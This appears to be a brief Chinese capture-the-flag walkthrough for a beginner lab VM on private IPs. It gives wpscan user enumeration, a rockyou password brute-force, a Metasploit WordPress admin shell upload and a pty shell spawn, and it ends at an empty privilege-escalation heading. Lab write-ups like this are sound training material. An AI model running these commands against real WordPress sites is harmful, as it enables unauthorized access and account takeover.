Description
This is super friendly box intended for Beginner's
This may work better with VirtualBox than VMware
靶机ip:192.168.34.163
kali ip:192.168.34.153
一、信息搜集
端口扫描
目录爆破
发现/wordpress
使用spscan扫描发现用户
wpscan --url http://192.168.34.163/wordpress --enumerate u
暴力破解
wpscan --url http://192.168.34.163/wordpress --usernames c0rrupt3d_brain --passwords /usr/share/wordlists/rockyou.txt
由于wordpress网站无法加载
msf中exploit /unix/webapp/wp_admin_shell_upload
可以获取shell
二、反弹shell
运行
交互shell
python3 -c 'import pty; pty.spawn("/bin/sh")'
看看home目录
发现root_password_ssh.txt
三、提权